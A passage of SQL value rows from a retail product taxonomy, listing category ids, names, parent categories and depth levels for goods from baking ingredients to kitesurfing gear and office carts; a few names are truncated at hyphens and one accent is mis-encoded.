(5542,'Spotting Scope Accessories',160,'Optic Accessories',3),
(5543,'Weapon Scope & Sight Accessories',160,'Optic Accessories',3),
(5545,'Optics Bags & Cases',160,'Optic Accessories',3),
(5546,'Pool Water Slides',2832,'Pool & Spa Accessories',3),
(5547,'Motorcycle Protective Gear',8301,'Vehicle Safety & Security',3),
(5549,'Baby & Toddler Diaper Covers',182,'Baby & Toddler Clothing',3),
(5551,'Pulse Oximeters',494,'Biometric Monitors',3),
(5552,'Hunting & Tactical Pants',5460,'Hunting Clothing',4),
(5555,'Paintball Clothing',5322,'Activewear',3),
(5556,'Gas Detector Accessories',5526,'Measuring Tool & Sensor Accessories',3),
(5557,'Electrical Testing Tool Accessories',5526,'Measuring Tool & Sensor Accessories',3),
(5558,'Clothing & Closet Storage',636,'Storage & Organization',3),
(5559,'Shoe Racks & Organizers',5558,'Clothing & Closet Storage',4),
(5561,'Satellite & Cable TV',386,'Video',2),
(5562,'Cable TV Receivers',5561,'Satellite & Cable TV',3),
(5564,'Soccer Uniforms',3598,'Sports Uniforms',4),
(5566,'Mobile Phone Stands',264,'Mobile Phone Accessories',4),
(5567,'Boot Liners',1933,'Shoe Accessories',2),
(5569,'Horse Boots & Leg Wraps',3257,'Horse Care',4),
(5570,'Yogurt Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(5571,'Tool Sockets',3650,'Tool Accessories',2),
(5572,'Motor Vehicle Speakerphones',8526,'Motor Vehicle Electronics',3),
(5573,'Jewelry Cleaning & Care',469,'Health & Beauty',1),
(5576,'Modem Accessories',342,'Networking',2),
(5577,'Soda Makers',730,'Kitchen Appliances',3),
(5578,'Wine Racks',6356,'Cabinets & Storage',2),
(5579,'Kitesurfing',499811,'Boating & Water Sports',3),
(5580,'Kiteboards',5579,'Kitesurfing',4),
(5581,'Kiteboard Parts',5579,'Kitesurfing',4),
(5582,'Kitesurfing Kites',5579,'Kitesurfing',4),
(5583,'Kitesurfing & Windsurfing Harnesses',5579,'Kitesurfing',4),
(5584,'Kiteboard Cases',5579,'Kitesurfing',4),
(5587,'Multifunction Power Tools',1167,'Tools',2),
(5588,'Lens & Filter Adapter Rings',2911,'Camera Lens Accessories',3),
(5589,'Radar Jammers',5695,'Signal Jammers',3),
(5590,'Aquatic Plants',985,'Plants',2),
(5591,'Safety Gloves',2047,'Work Safety Protective Gear',2),
(5592,'Work Lights',1167,'Tools',2),
(5593,'Horse Tack',1031,'Equestrian',3),
(5594,'Riding Apparel & Accessories',1031,'Equestrian',3),
(5596,'Noise Gates & Compressors',246,'Signal Processors',4),
(5597,'Loudspeaker Management Systems',246,'Signal Processors',4),
(5598,'Coats & Jackets',203,'Outerwear',3),
(5599,'Projection & Tripod Skirts',393,'Projector Accessories',4),
(5600,'Boot Pulls',628,'Shoe Care & Tools',3),
(5601,'Shoe Horns & Dressing Aids',628,'Shoe Care & Tools',3),
(5602,'Scrub Caps',2496,'Medical',2),
(5604,'Shoe Treatments & Dyes',628,'Shoe Care & Tools',3),
(5605,'Religious & Ceremonial',0,'',0),
(5606,'Memorial Ceremony Supplies',5605,'Religious & Ceremonial',1),
(5607,'Memorial Urns',5606,'Memorial Ceremony Supplies',2),
(5608,'Shopping Totes',5181,'Luggage & Bags',1),
(5609,'Figurines',696,'Decor',2),
(5612,'GPS Jammers',5695,'Signal Jammers',3),
(5613,'Vehicle Parts & Accessories',888,'Vehicles & Parts',1),
(5614,'Vehicles',888,'Vehicles & Parts',1),
(5620,'Packing Organizers',110,'Luggage Accessories',2),
(5621,'Toddler Underwear',182,'Baby & Toddler Clothing',3),
(5622,'Baby & Toddler Outfits',182,'Baby & Toddler Clothing',3),
(5623,'Baby & Toddler Belts',5422,'Baby & Toddler Clothing Accessories',3),
(5624,'Baby & Toddler Gloves & Mittens',5422,'Baby & Toddler Clothing Accessories',3),
(5625,'Baby & Toddler Hats',5422,'Baby & Toddler Clothing Accessories',3),
(5626,'Baby Protective Wear',5422,'Baby & Toddler Clothing Accessories',3),
(5627,'Electrical Plug Caps',127,'Power & Electrical Supplies',2),
(5628,'Changing Mats & Trays',548,'Diapering',2),
(5629,'Burp Cloths',561,'Nursing & Feeding',2),
(5630,'Baby Bottle Nipples & Liners',561,'Nursing & Feeding',2),
(5631,'Household Storage Containers',636,'Storage & Organization',3),
(5632,'Gardening Accessories',2962,'Gardening',3),
(5633,'Gardening Totes',5632,'Gardening Accessories',4),
(5635,'Hydration Systems',1011,'Outdoor Recreation',2),
(5636,'Compression Sacks',1013,'Camping & Hiking',3),
(5642,'Parchment Paper',3110,'Food Wraps',4),
(5644,'Yachts',3540,'Watercraft',3),
(5646,'Water Softener Salt',2273,'Water Dispensing & Filtration',3),
(5647,'Flatware Sets',675,'Flatware',4),
(5650,'Travel Pouches',110,'Luggage Accessories',2),
(5651,'Luggage Tags',110,'Luggage Accessories',2),
(5652,'Luggage Straps',110,'Luggage Accessories',2),
(5654,'Pool Heaters',2832,'Pool & Spa Accessories',3),
(5655,'Tent Accessories',1013,'Camping & Hiking',3),
(5656,'Tent Footprints',5655,'Tent Accessories',4),
(5657,'Tent Vestibules',5655,'Tent Accessories',4),
(5658,'Tent Poles & Stakes',5655,'Tent Accessories',4),
(5659,'Network Bridges',1350,'Bridges & Routers',3),
(5663,'Massage & Relaxation',2915,'Personal Care',2),
(5664,'Massage Oil',5663,'Massage & Relaxation',3),
(5665,'Toilet Tanks',2691,'Toilet & Bidet Accessories',4),
(5666,'Toilet Tank Covers',2691,'Toilet & Bidet Accessories',4),
(5669,'Stylus Pen Nibs & Refills',279,'Computer Accessories',3),
(5670,'Outdoor Grill Carts',3684,'Outdoor Grill Accessories',4),
(5671,'Smoking Chips & Pellets',3684,'Outdoor Grill Accessories',4),
(5672,'Outdoor Grilling Planks',3684,'Outdoor Grill Accessories',4),
(5673,'Kimono Outerwear',5388,'Traditional & Ceremonial Clothing',3),
(5674,'Hakama Trousers',5388,'Traditional & Ceremonial Clothing',3),
(5676,'Yukata',5388,'Traditional & Ceremonial Clothing',3),
(5685,'Tabi Socks',5390,'Traditional Clothing Accessories',3),
(5687,'Obis',5390,'Traditional Clothing Accessories',3),
(5690,'Hearing Aids',491,'Health Care',2),
(5693,'Stopwatches',990,'Exercise & Fitness',2),
(5694,'Charcoal Briquettes',3684,'Outdoor Grill Accessories',4),
(5695,'Signal Jammers',2082,'Electronics Accessories',2),
(5696,'Mobile Phone Jammers',5695,'Signal Jammers',3),
(5697,'Bicycle Activewear',5322,'Activewear',3),
(5702,'Nutrition Drinks & Shakes',2890,'Fitness & Nutrition',3),
(5704,'Clothespins',627,'Laundry Supplies',3),
(5705,'Fabric Shavers',627,'Laundry Supplies',3),
(5706,'Ear Candles',506,'Ear Care',3),
(5707,'Utility Hooks',2446,'Storage Hooks & Racks',4),
(5708,'Coat & Hat Racks',696,'Decor',2),
(5709,'Party & Celebration',8,'Arts & Entertainment',1),
(5710,'Hobbies & Creative Arts',8,'Arts & Entertainment',1),
(5711,'Disco Balls',408,'Special Effects',3),
(5713,'Loungewear',208,'Sleepwear & Loungewear',3),
(5714,'Closet Organizers & Garment Racks',5558,'Clothing & Closet Storage',4),
(5716,'Clothes Valets',5558,'Clothing & Closet Storage',4),
(5718,'Baby Drinks',562,'Baby & Toddler Food',3),
(5719,'Baby Food',562,'Baby & Toddler Food',3),
(5720,'Baby Snacks',562,'Baby & Toddler Food',3),
(5721,'Baby Cereal',562,'Baby & Toddler Food',3),
(5723,'Sports & Energy Drinks',413,'Beverages',2),
(5724,'Non',413,'Beverages',2),
(5725,'Cocktail Mixes',499676,'Alcoholic Beverages',3),
(5740,'Dips & Spreads',422,'Food Items',2),
(5741,'Hummus',5740,'Dips & Spreads',3),
(5742,'Guacamole',5740,'Dips & Spreads',3),
(5743,'Pudding & Gelatin Snacks',423,'Snack Foods',3),
(5744,'Fruit Snacks',423,'Snack Foods',3),
(5745,'Trail & Snack Mixes',423,'Snack Foods',3),
(5746,'Croutons',423,'Snack Foods',3),
(5747,'Cereal & Granola Bars',423,'Snack Foods',3),
(5748,'Tortillas & Wraps',1876,'Bakery',3),
(5749,'Pies & Tarts',1876,'Bakery',3),
(5750,'Pastries & Scones',1876,'Bakery',3),
(5751,'Donuts',1876,'Bakery',3),
(5752,'Dough',2660,'Cooking & Baking Ingredients',3),
(5753,'Pie Crusts',5752,'Dough',4),
(5755,'Bread & Pastry Dough',5752,'Dough',4),
(5756,'Cookie & Brownie Dough',5752,'Dough',4),
(5759,'Pasta Sauce',427,'Condiments & Sauces',3),
(5760,'Olives & Capers',427,'Condiments & Sauces',3),
(5762,'Gravy',427,'Condiments & Sauces',3),
(5763,'Fish Sauce',427,'Condiments & Sauces',3),
(5765,'Shortening & Lard',2660,'Cooking & Baking Ingredients',3),
(5766,'Molasses',2660,'Cooking & Baking Ingredients',3),
(5767,'Marshmallows',2660,'Cooking & Baking Ingredients',3),
(5768,'Unflavored Gelatin',2660,'Cooking & Baking Ingredients',3),
(5769,'Frosting & Icing',2660,'Cooking & Baking Ingredients',3),
(5770,'Corn Syrup',2660,'Cooking & Baking Ingredients',3),
(5771,'Cooking Starch',2660,'Cooking & Baking Ingredients',3),
(5773,'Bread Crumbs',2660,'Cooking & Baking Ingredients',3),
(5774,'Baking Soda',2660,'Cooking & Baking Ingredients',3),
(5775,'Baking Flavors & Extracts',2660,'Cooking & Baking Ingredients',3),
(5776,'Baking Chocolate',2660,'Cooking & Baking Ingredients',3),
(5777,'Cooking Wine',2660,'Cooking & Baking Ingredients',3),
(5778,'Waffle & Pancake Mixes',2660,'Cooking & Baking Ingredients',3),
(5785,'Cream Cheese',5740,'Dips & Spreads',3),
(5786,'Cream',428,'Dairy Products',3),
(5787,'Sour Cream',428,'Dairy Products',3),
(5788,'Frozen Desserts & Novelties',422,'Food Items',2),
(5789,'Ice Pops',5788,'Frozen Desserts & Novelties',3),
(5790,'Ice Cream Cones',1876,'Bakery',3),
(5792,'Salad Mixes',6622,'Greens',5),
(5793,'Fresh & Frozen Vegetables',430,'Fruits & Vegetables',3),
(5794,'Fruit Sauces',430,'Fruits & Vegetables',3),
(5795,'Fresh & Frozen Fruits',430,'Fruits & Vegetables',3),
(5796,'Dry Beans',430,'Fruits & Vegetables',3),
(5797,'Canned & Prepared Beans',430,'Fruits & Vegetables',3),
(5798,'Canned & Jarred Vegetables',430,'Fruits & Vegetables',3),
(5799,'Canned & Jarred Fruits',430,'Fruits & Vegetables',3),
(5800,'Pie & Pastry Fillings',2660,'Cooking & Baking Ingredients',3),
(5804,'Lunch & Deli Meats',4628,'Meat',4),
(5805,'Fresh & Frozen Meats',4628,'Meat',4),
(5807,'Tofu, Soy & Vegetarian Products',422,'Food Items',2),
(5808,'Seitan',5807,'Tofu, Soy & Vegetarian Products',3),
(5809,'Tofu',5807,'Tofu, Soy & Vegetarian Products',3),
(5810,'Tempeh',5807,'Tofu, Soy & Vegetarian Products',3),
(5811,'Canned Meats',4628,'Meat',4),
(5812,'Fresh & Frozen Seafood',4629,'Seafood',4),
(5813,'Canned Seafood',4629,'Seafood',4),
(5814,'Prepared Foods',422,'Food Items',2),
(5820,'Skin Insect Repellent',567,'Skin Care',4),
(5821,'Feminine Douches & Creams',485,'Feminine Sanitary Supplies',3),
(5823,'Dental Mouthguards',526,'Oral Care',3),
(5824,'Denture Cleaners',526,'Oral Care',3),
(5825,'Furniture Cleaners & Polish',4973,'Household Cleaning Products',4),
(5826,'Air Conditioner Covers',2367,'Air Conditioner Accessories',3),
(5827,'Butter & Margarine',428,'Dairy Products',3),
(5828,'Oil Filter Drains',1167,'Tools',2),
(5829,'Impulse Sealers',922,'Office Supplies',1),
(5830,'Industrial Storage',111,'Business & Industrial',1),
(5831,'Shipping Containers',5830,'Industrial Storage',2),
(5832,'Industrial Cabinets',5830,'Industrial Storage',2),
(5833,'Industrial Shelving',5830,'Industrial Storage',2),
(5834,'Underwear Slips',213,'Underwear & Socks',3),
(5835,'Emergency Preparedness',536,'Home & Garden',1),
(5836,'Emergency Food Kits',5835,'Emergency Preparedness',2),
(5837,'Twist Ties & Bag Clips',6478,'Food Storage Accessories',3),
(5838,'Gift Bags',94,'Gift Wrapping',4),
(5841,'Wallet Chains',6552,'Handbag & Wallet Accessories',2),
(5842,'Bicycle Child Seats',3214,'Bicycle Accessories',4),
(5843,'Nursing Covers',561,'Nursing & Feeding',2),
(5845,'Shopping Cart & High Chair Covers',4386,'Baby Transport Accessories',2),
(5847,'Fragrance Oil',592,'Home Fragrances',3),
(5848,'Heat Rubs',516,'Hot & Cold Therapies',4),
(5849,'Acupuncture',491,'Health Care',2),
(5850,'Acupuncture Models',5849,'Acupuncture',3),
(5851,'Acupuncture Needles',5849,'Acupuncture',3),
(5853,'Tattoo Cover',4326,'Tattooing Supplies',3),
(5859,'Baby Gift Sets',537,'Baby & Toddler',1),
(5860,'Model & Toys Manuals',5037,'Product Manuals',2),
(5861,'Exercise & Fitness Equipment Manuals',5037,'Product Manuals',2),
(5863,'Advertising & Marketing',111,'Business & Industrial',1),
(5864,'Trade Show Counters',5863,'Advertising & Marketing',2),
(5865,'Trade Show Displays',5863,'Advertising & Marketing',2),
(5866,'Tractors',3798,'Outdoor Power Equipment',3),
(5867,'Tractor Parts & Accessories',4564,'Outdoor Power Equipment Accessories',3),
(5868,'Trophies & Awards',5709,'Party & Celebration',2),
(5869,'Exercise Bands',990,'Exercise & Fitness',2),
(5870,'Occupational & Physical Therapy Equipment',491,'Health Care',2),
(5872,'Magnet Toys',3074,'Executive Toys',3),
(5873,'Magnetic Sweepers',1167,'Tools',2),
(5875,'Decorative Plates',696,'Decor',2),
(5876,'Refrigerator Magnets',696,'Decor',2),
(5877,'Air Suits',3789,'Hang Gliding & Skydiving',3),
(5878,'Flight Suits',2306,'Uniforms',3),
(5879,'Riding Scooters',1011,'Outdoor Recreation',2),
(5880,'Nail Dryers',2975,'Nail Tools',5),
(5881,'Sleeping Bag Liners',1013,'Camping & Hiking',3),
(5883,'Stencil Machines',505392,'Craft Measuring & Marking Tools',5),
(5884,'Brochures',5863,'Advertising & Marketing',2),
(5885,'Novelty Signs',696,'Decor',2),
(5886,'Kitchen & Dining Room Chairs',443,'Chairs',2),
(5887,'Flavored Alcoholic Beverages',499676,'Alcoholic Beverages',3),
(5892,'Safety & Warning Signs',976,'Signage',2),
(5893,'Security Signs',976,'Signage',2),
(5894,'Emergency & Exit Signs',976,'Signage',2),
(5895,'Road & Traffic Signs',976,'Signage',2),
(5896,'Parking Signs & Permits',976,'Signage',2),
(5897,'Facility Identification Signs',976,'Signage',2),
(5898,'Retail & Sale Signs',976,'Signage',2),
(5899,'Sidewalk & Yard Signs',976,'Signage',2),
(5900,'Policy Signs',976,'Signage',2),
(5904,'Bakery Assortments',1876,'Bakery',3),
(5907,'Costume Capes',5192,'Costume Accessories',3),
(5908,'Motorcycle Gloves',5547,'Motorcycle Protective Gear',4),
(5909,'Snow Pants & Suits',203,'Outerwear',3),
(5910,'Outdoor Blankets',2918,'Outdoor Living',3),
(5911,'Beach Mats',5910,'Outdoor Blankets',4),
(5912,'Poncho Liners',5910,'Outdoor Blankets',4),
(5913,'Picnic Blankets',5910,'Outdoor Blankets',4),
(5914,'Tiaras',171,'Hair Accessories',3),
(5915,'Hair Wreaths',171,'Hair Accessories',3),
(5916,'Corsages & BoutonniÃ¨res',2559,'Gift Giving',3),
(5917,'Hunting Dog Equipment',3136,'Hunting',4),
(5918,'Business Forms & Receipts',956,'Paper Products',3),
(5919,'Receipt & Adding Machine Paper Rolls',956,'Paper Products',3),
(5921,'Light Boxes',504639,'Art & Crafting Tools',4),
(5922,'Shadow Boxes',696,'Decor',2),
(5923,'Surgical Lubricants',491,'Health Care',2),
(5927,'Hardware Torches',1167,'Tools',2),
(5928,'Cooking Torches',668,'Kitchen Tools & Utensils',3),
(5930,'Japanese Traditional Dolls',596,'Seasonal & Holiday Decorations',3),
(5935,'Virtual Currency',5032,'Digital Goods & Currency',2),
(5937,'Surveillance Camera Accessories',143,'Camera Parts & Accessories',3),
(5938,'Storage Cabinets & Lockers',6356,'Cabinets & Storage',2),
(5939,'Turbans',2020,'Headwear',3),
(5941,'Leg Warmers',167,'Clothing Accessories',2),
(5942,'Arm Warmers & Sleeves',167,'Clothing Accessories',2),
(5949,'Military Uniforms',2306,'Uniforms',3),
(5959,'Motorcycle Chest & Back Protectors',5547,'Motorcycle Protective Gear',4),
(5960,'Motorcycle Kidney Belts',5547,'Motorcycle Protective Gear',4),
(5961,'Motorcycle Neck Braces',5547,'Motorcycle Protective Gear',4),
(5962,'Motorcycle Knee & Shin Guards',5547,'Motorcycle Protective Gear',4),
(5963,'Motorcycle Elbow & Wrist Guards',5547,'Motorcycle Protective Gear',4),
(5965,'Medical Identification Tags & Jewelry',491,'Health Care',2),
(5966,'Medical Alarm Systems',491,'Health Care',2),
(5967,'Special Effects Controllers',408,'Special Effects',3),
(5968,'Remote Control Motorcycles',2546,'Remote Control Toys',3),
(5969,'Remote Control Tanks',2546,'Remote Control Toys',3),
(5970,'Play Vehicle Accessories',1253,'Toys',2),
(5971,'Toy Race Car & Track Accessories',5970,'Play Vehicle Accessories',3),
(5974,'Jewelry Holders',5573,'Jewelry Cleaning & Care',2),
(5975,'Nail Art Kits & Accessories',478,'Nail Care',4),
(5976,'Toners & Astringents',567,'Skin Care',4),
(5977,'Hair Coloring Accessories',486,'Hair Care',3),
(5978,'Body Makeup',477,'Makeup',4),
(5979,'Body Paint & Foundation',5978,'Body Makeup',5),
(5980,'Body Powder',567,'Skin Care',4),
(5981,'Body & Hair Glitter',5978,'Body Makeup',5),
(5982,'Rhinestones & Flatbacks',505379,'Embellishments & Trims',5),
(5989,'Window Films',603,'Window Treatments',3),
(5990,'Holiday Stocking Hangers',596,'Seasonal & Holiday Decorations',3),
(5991,'Holiday Stockings',596,'Seasonal & Holiday Decorations',3),
(5992,'Hand',505393,'Needles & Hooks',5),
(5994,'Vehicle License Plate Frames',2495,'Vehicle Decor',4),
(5995,'Vehicle Emblems & Hood Ornaments',2495,'Vehicle Decor',4),
(5996,'Jewelry Findings',505379,'Embellishments & Trims',5),
(5997,'Address Books',923,'Filing & Organization',2),
(5998,'Hydration System Accessories',1011,'Outdoor Recreation',2),
(5999,'Model Making',5710,'Hobbies & Creative Arts',2),
(6000,'Scale Model Accessories',216,'Collectibles',3),
(6001,'Electronic Musical Instruments',54,'Musical Instruments',3),
(6002,'MIDI Controllers',6001,'Electronic Musical Instruments',4),
(6003,'Sound Synthesizers',6001,'Electronic Musical Instruments',4),
(6006,'Motorcycle Jackets',5517,'Motorcycle Protective Clothing',4),
(6016,'Satellite LNBs',5476,'Antenna Accessories',3),
(6017,'Snoring & Sleep Apnea Aids',4076,'Sleeping Aids',3),
(6018,'Hair Styling Tool Accessories',486,'Hair Care',3),
(6019,'Hair Styling Tools',486,'Hair Care',3),
(6027,'3D Modeling Software',319,'Multimedia & Design Software',3),
(6028,'Media Viewing Software',319,'Multimedia & Design Software',3),
(6029,'Home & Interior Design Software',319,'Multimedia & Design Software',3),
(6030,'Mobile Phone Pre',264,'Mobile Phone Accessories',4),
(6031,'Dirndls',5388,'Traditional & Ceremonial Clothing',3),
(6034,'Makeup Removers',567,'Skin Care',4),
(6037,'Dice Sets & Games',3793,'Games',2),
(6038,'Tile Games',3793,'Games',2),
(6040,'Erotic Games',773,'Erotic',2),
(6041,'Vehicle Base Rack Systems',3472,'Motor Vehicle Carrying Racks',4),
(6042,'Vehicle Water Sport Board Racks',3472,'Motor Vehicle Carrying Racks',4),
(6043,'Vehicle Ski & Snowboard Racks',3472,'Motor Vehicle Carrying Racks',4),
(6044,'Vehicle Motorcycle & Scooter Racks',3472,'Motor Vehicle Carrying Racks',4),
(6046,'Vehicle Fishing Rod Racks',3472,'Motor Vehicle Carrying Racks',4),
(6047,'Vehicle Boat Racks',3472,'Motor Vehicle Carrying Racks',4),
(6048,'Bicycle Water Sport Board Racks',3214,'Bicycle Accessories',4),
(6049,'Coffee & Tea Cups',674,'Drinkware',4),
(6051,'Coffee & Tea Saucers',674,'Drinkware',4),
(6052,'Hair Permanents & Straighteners',486,'Hair Care',3),
(6053,'Hair Color Removers',486,'Hair Care',3),
(6054,'Dexterity Games',3793,'Games',2),
(6055,'Soccer Goal Accessories',1111,'Soccer',3),
(6056,'Puppet & Puppet Theater Accessories',1255,'Dolls, Playsets & Toy Figures',3),
(6057,'Puppet Theaters',1255,'Dolls, Playsets & Toy Figures',3),
(6058,'Action & Toy Figures',1255,'Dolls, Playsets & Toy Figures',3),
(6059,'Remote Control Robots',2546,'Remote Control Toys',3),
(6062,'Ski Boots',499845,'Skiing & Snowboarding',4),
(6063,'Ski Bindings',499845,'Skiing & Snowboarding',4),
(6064,'Skis',499845,'Skiing & Snowboarding',4),
(6065,'Pens & Pencils',977,'Writing & Drawing Instruments',3),
(6066,'Pen & Pencil Sets',6065,'Pens & Pencils',4),
(6067,'Multifunction Writing Instruments',977,'Writing & Drawing Instruments',3),
(6068,'Pencils',6065,'Pens & Pencils',4),
(6069,'Cosmetic Sets',473,'Cosmetics',3),
(6070,'Cookware & Bakeware',638,'Kitchen & Dining',2),
(6071,'Cookware & Bakeware Combo Sets',6070,'Cookware & Bakeware',3),
(6072,'Makeup Finishing Sprays',477,'Makeup',4),
(6073,'Wall Light Fixtures',3006,'Lighting Fixtures',3),
(6074,'Hockey Goals',499915,'Figure Skating & Hockey',3),
(6076,'Hockey Sticks',499915,'Figure Skating & Hockey',3),
(6077,'Hockey Balls & Pucks',499915,'Figure Skating & Hockey',3),
(6078,'Hockey Gloves',1105,'Hockey Protective Gear',4),
(6080,'Hockey Helmets',1105,'Hockey Protective Gear',4),
(6083,'Motorcycle Alarms & Locks',2768,'Vehicle Alarms & Locks',4),
(6084,'Automotive Alarm Accessories',2768,'Vehicle Alarms & Locks',4),
(6085,'Aquatic Plant Fertilizers',6,'Fish Supplies',3),
(6086,'Butter Dishes',4026,'Serveware',4),
(6087,'Bicycle Skinsuits',5697,'Bicycle Activewear',4),
(6088,'Motorcycle Rims & Wheels',2932,'Motor Vehicle Rims & Wheels',5),
(6090,'Automotive Rims & Wheels',2932,'Motor Vehicle Rims & Wheels',5),
(6091,'Motorcycle Tires',911,'Motor Vehicle Tires',5),
(6093,'Automotive Tires',911,'Motor Vehicle Tires',5),
(6094,'Lawn Mower Wheels',4566,'Lawn Mower Accessories',4),
(6095,'Lawn Mower Tires',4566,'Lawn Mower Accessories',4),
(6097,'Pedal Boats',1120,'Boating & Rafting',4),
(6098,'Gongs',75,'Percussion',4),
(6099,'Hair Loss Concealers',486,'Hair Care',3),
(6100,'Corsage & BoutonniÃ¨re Pins',2559,'Gift Giving',3),
(6101,'Safety Pins',504639,'Art & Crafting Tools',4),
(6102,'Jewelry & Beading Wire',505377,'Crafting Wire',5),
(6103,'Weighted Clothing',990,'Exercise & Fitness',2),
(6104,'Body Oil',567,'Skin Care',4),
(6105,'Canopy & Gazebo Accessories',2613,'Outdoor Structures',4),
(6106,'Canopy & Gazebo Frames',6105,'Canopy & Gazebo Accessories',5),
(6107,'Canopy & Gazebo Enclosure Kits',6105,'Canopy & Gazebo Accessories',5),
(6108,'Canopy & Gazebo Tops',6105,'Canopy & Gazebo Accessories',5),
(6109,'Combat Knives',780,'Weapons',2),
(6110,'Transfer Paper',24,'Art & Craft Paper',5),
(6117,'Craft Foam & Styrofoam',505381,'Craft Shapes & Bases',5),
(6119,'Craft Scoring Tools',504640,'Craft Cutting & Embossing Tools',5),
(6121,'Embossing Powder',505372,'Art & Crafting Materials',4),
(6122,'Embossing Pens & Styluses',504640,'Craft Cutting & Embossing Tools',5),
(6125,'Screen Printing Squeegees',505392,'Craft Measuring & Marking Tools',5),
(6126,'Brayer Rollers',505392,'Craft Measuring & Marking Tools',5),
(6127,'Crochet Hooks',505393,'Needles & Hooks',5),
(6133,'Felting Pads & Mats',504639,'Art & Crafting Tools',4),
(6134,'Felting Needles & Machines',505388,'Textile Craft Machines',5),
(6135,'Felting Molds',505371,'Crafting Patterns & Molds',4),
(6136,'Spinning Wheel Accessories',504643,'Art & Crafting Tool Accessories',4),
(6137,'Spinning Wheels',505388,'Textile Craft Machines',5),
(6138,'Hand Spindles',505387,'Thread & Yarn Tools',5),
(6139,'Knitting Needles',505393,'Needles & Hooks',5),
(6140,'Unspun Fiber',505382,'Crafting Fibers',5),
(6142,'Filling & Padding Material',505372,'Art & Crafting Materials',4),
(6145,'Hook and Loop Fasteners',505380,'Craft Fasteners & Closures',5),
(6146,'Elastic',505379,'Embellishments & Trims',5),
(6150,'Dress Forms',504639,'Art & Crafting Tools',4),
(6151,'Blocking Wires',504639,'Art & Crafting Tools',4),
(6152,'Blocking Mats',504639,'Art & Crafting Tools',4),
(6153,'Thread, Yarn & Bobbin Winders',505387,'Thread & Yarn Tools',5),
(6154,'Thread & Yarn Spools',505387,'Thread & Yarn Tools',5),
(6155,'Thread & Yarn Guides',505387,'Thread & Yarn Tools',5),
(6156,'Thimbles & Sewing Palms',504639,'Art & Crafting Tools',4),
(6157,'Textile Art Gauges & Rulers',505392,'Craft Measuring & Marking Tools',5),
(6158,'Frames, Hoops & Stretchers',504639,'Art & Crafting Tools',4),
(6159,'Straight Pins',504639,'Art & Crafting Tools',4),
(6160,'Stitch Markers & Counters',505392,'Craft Measuring & Marking Tools',5),
(6161,'Seam Rippers',504640,'Craft Cutting & Embossing Tools',5),
(6163,'Needle Threaders',505387,'Thread & Yarn Tools',5),
(6164,'Fiber Cards & Brushes',505387,'Thread & Yarn Tools',5),
(6166,'Weaving Shuttles',505387,'Thread & Yarn Tools',5),
(6167,'Weaving Beaters',505387,'Thread & Yarn Tools',5),
(6168,'Latch & Locker Hooks',505393,'Needles & Hooks',5),
(6169,'Business Card Cases',6551,'Handbags, Wallets & Cases',2),
(6170,'Badge & Pass Holders',6551,'Handbags, Wallets & Cases',2),
(6171,'Business Card Stands',923,'Filing & Organization',2),
(6173,'Umbrella Sleeves & Cases',536,'Home & Garden',1),
(6174,'Book Accessories',922,'Office Supplies',1),
(6175,'Book Stands & Rests',6174,'Book Accessories',2),
(6176,'Book Covers',6174,'Book Accessories',2),
(6177,'Card Sleeves',923,'Filing & Organization',2),
(6178,'Pencil Boards',2014,'Paper Handling',2),
(6179,'Utility Carts',6373,'Office Carts',2),
(6180,'File Carts',6373,'Office Carts',2),
(6181,'Mail Carts',6373,'Office Carts',2),
(6182,'Book Carts',6373,'Office Carts',2),
(6183,'Hair Nets',171,'Hair Accessories',3),
(6186,'Tennis Autographed Sports Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(6187,'Tennis Fan Accessories',3515,'Sports Fan Accessories',5),
(6189,'Breath Spray',526,'Oral Care',3),
(6190,'Business Card Books',923,'Filing & Organization',2),
(6191,'De',2277,'Chemicals',3),
(6192,'Cheese Puffs',423,'Snack Foods',3),
(6194,'Pork Rinds',423,'Snack Foods',3),
(6195,'Cupcakes',1876,'Bakery',3),
(6196,'Coffee Cakes',1876,'Bakery',3),
(6199,'Pepper',4608,'Seasonings & Spices',3),
(6203,'Pizza Sauce',427,'Condiments & Sauces',3),
(6204,'Apple Butter',5740,'Dips & Spreads',3),
(6205,'Heating Pads',516,'Hot & Cold Therapies',4),
(6206,'Cast & Bandage Protectors',508,'First Aid',3),
(6219,'Candied & Chocolate Covered Fruit',422,'Food Items',2),
(6227,'Japanese Black Formal Wear',5388,'Traditional & Ceremonial Clothing',3),
(6238,'Earmuffs',167,'Clothing Accessories',2),
(6240,'Fabric Refreshers',627,'Laundry Supplies',3),
(6242,'Nutrition Gels & Chews',2890,'Fitness & Nutrition',3),
(6246,'Worcestershire Sauce',427,'Condiments & Sauces',3),
(6248,'Pet Flea & Tick Control',2,'Pet Supplies',2),
(6249,'Pet Leashes',2,'Pet Supplies',2),
(6250,'Pet Collars & Harnesses',2,'Pet Supplies',2),
(6251,'Pet Carriers & Crates',2,'Pet Supplies',2),
(6252,'Pet Bowls, Feeders & Waterers',2,'Pet Supplies',2),
(6253,'Pet Leash Extensions',2,'Pet Supplies',2),
(6254,'Window Treatment Accessories',696,'Decor',2),
(6255,'Curtain Holdbacks & Tassels',6254,'Window Treatment Accessories',3),
(6256,'Curtain & Drape Rings',6254,'Window Treatment Accessories',3),
(6257,'Curtain & Drape Rods',6254,'Window Treatment Accessories',3),
(6258,'Tow',694,'Lawn Mowers',4),
(6259,'Quinoa',431,'Grains, Rice & Cereal',3),
(6260,'Skin Cleansing Brushes & Systems',2958,'Skin Care Tools',5),
(6261,'Skin Care Extractors',2958,'Skin Care Tools',5),
(6262,'Skin Care Masks & Peels',567,'Skin Care',4),
(6263,'Duster Refills',623,'Household Cleaning Supplies',3),
(6264,'Mop Heads & Refills',623,'Household Cleaning Supplies',3),
(6265,'Artificial Flora',696,'Decor',2),
(6266,'Artificial Food',696,'Decor',2),
(6267,'Wreaths & Garlands',696,'Decor',2),
(6268,'Leis',167,'Clothing Accessories',2),
(6269,'Swing Set & Playset Accessories',1249,'Outdoor Play Equipment',2),
(6270,'Play Swings',1249,'Outdoor Play Equipment',2),
(6271,'Swing Sets & Playsets',1249,'Outdoor Play Equipment',2),
(6272,'Track Lighting Accessories',6274,'Track Lighting',3),
(6273,'Track Lighting Rails',6274,'Track Lighting',3),
(6274,'Track Lighting',594,'Lighting',2),
(6275,'Hospital Curtains',2496,'Medical',2),
(6276,'Pet Strollers',2,'Pet Supplies',2),
(6277,'Lanyards',6552,'Handbag & Wallet Accessories',2),
(6278,'Pizza Makers & Ovens',5289,'Toasters & Grills',4),
(6279,'Water Ovens',4532,'Food Cookers & Steamers',4),
(6280,'Vital Signs Monitors',3477,'Medical Equipment',3),
